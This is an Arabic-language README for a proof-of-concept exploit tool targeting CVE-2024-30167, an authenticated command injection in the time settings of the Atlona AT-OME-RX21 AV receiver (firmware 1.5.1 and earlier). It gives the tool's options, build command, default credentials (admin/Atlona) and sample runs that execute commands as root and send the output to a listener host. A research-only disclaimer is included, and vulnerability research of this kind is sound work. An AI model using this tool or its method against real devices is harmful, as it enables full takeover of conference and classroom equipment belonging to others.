
إثبات مفهوم لاستغلال حقن أوامر مُصادق عليه في جهاز Atlona AT-OME-RX21، مما يسمح بتنفيذ أوامر على مستوى الجذر عبر واجهة إعدادات الوقت.
إخلاء مسؤولية: يُقدَّم إثبات المفهوم هذا للأغراض التعليمية والبحثية فقط. لا تستخدم هذا الرمز على أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها. لست مسؤولاً عن أي إساءة استخدام.
توجد ثغرة حقن أوامر موثقة في واجهة إعداد الوقت لمبدل AV Atlona AT-OME-RX21. يمكن للمستخدم الذي يمتلك بيانات اعتماد صالحة حقن أوامر نظام التشغيل التي يتم تنفيذها بصلاحيات الجذر (root)، مما يؤدي إلى اختراق كامل للنظام.
Atlona AT-OME-RX21 هو مستقبل ومقياس AV (صوت/فيديو) مصمم لبيئات مؤتمرات الفيديو والتعاون الاحترافية. يُستخدم غالباً في غرف المؤتمرات والفصول الدراسية ومساحات الاجتماعات الصغيرة. يساعد في توصيل الأجهزة مثل أجهزة الكمبيوتر المحمولة/أنظمة المؤتمرات بالشاشات.
يعمل إثبات المفهوم هذا مع جميع إصدارات البرامج الثابتة <= 1.5.1
معلومات البائع: https://atlona.com/product/at-ome-rx21/
$ .\cve-2024-30167.exe -h
▄█████ ██ ██ ██████ ████▄ ▄██▄ ████▄ ██ ██ ████▄ ▄██▄ ▄██ ▄██▀▀▀ ██████
██ ██▄▄██ ██▄▄ ▄▄▄ ▄██▀ ██ ██ ▄██▀ ▀█████ ▄▄▄ ▄▄██ ██ ██ ██ ██▄▄▄ ▄██▀
▀█████ ▀██▀ ██▄▄▄▄ ███▄▄ ▀██▀ ███▄▄ ██ ▄▄▄█▀ ▀██▀ ██ ▀█▄▄█▀ ██▀
PoC by: github.com/RIZZZIOM
Usage of cve-2024-30167.exe:
-P string
listening port for command output (default "4444")
-c string
Command to execute on the target
-l string
listening host for command output
-p string
Password for authentication (default "Atlona")
-t string
Target URL (e.g: http://example.com)
-u string
Username for authentication (default "admin")
go build -o <OUTPUT_FILENAME>
$ .\cve-2024-30167.exe -P 8000 -c 'whoami' -l 192.168.1.100 -t http://192.168.1.103:1337
▄█████ ██ ██ ██████ ████▄ ▄██▄ ████▄ ██ ██ ████▄ ▄██▄ ▄██ ▄██▀▀▀ ██████
██ ██▄▄██ ██▄▄ ▄▄▄ ▄██▀ ██ ██ ▄██▀ ▀█████ ▄▄▄ ▄▄██ ██ ██ ██ ██▄▄▄ ▄██▀
▀█████ ▀██▀ ██▄▄▄▄ ███▄▄ ▀██▀ ███▄▄ ██ ▄▄▄█▀ ▀██▀ ██ ▀█▄▄█▀ ██▀
PoC by: github.com/RIZZZIOM
Listening on 192.168.1.100:8000 for response...
Command Injection Successful
=====Received Response=====
root
$ .\cve-2024-30167.exe -P 8000 -c 'id' -l 192.168.1.100 -t http://192.168.1.103:1337
▄█████ ██ ██ ██████ ████▄ ▄██▄ ████▄ ██ ██ ████▄ ▄██▄ ▄██ ▄██▀▀▀ ██████
██ ██▄▄██ ██▄▄ ▄▄▄ ▄██▀ ██ ██ ▄██▀ ▀█████ ▄▄▄ ▄▄██ ██ ██ ██ ██▄▄▄ ▄██▀
▀█████ ▀██▀ ██▄▄▄▄ ███▄▄ ▀██▀ ███▄▄ ██ ▄▄▄█▀ ▀██▀ ██ ▀█▄▄█▀ ██▀
PoC by: github.com/RIZZZIOM
Listening on 192.168.1.100:8000 for response...
Command Injection Successful
=====Received Response=====
uid=0(root) gid=0(root) groups=0(root)
يستخدم الأمر أعلاه بيانات الاعتماد الافتراضية لتسجيل الدخول إلى الجهاز.
الصيغة:
.\cve=2024-30167.exe -P <listening_port> -c <command> -l <listener_host> -t <target_uri> -u <username> -p <password>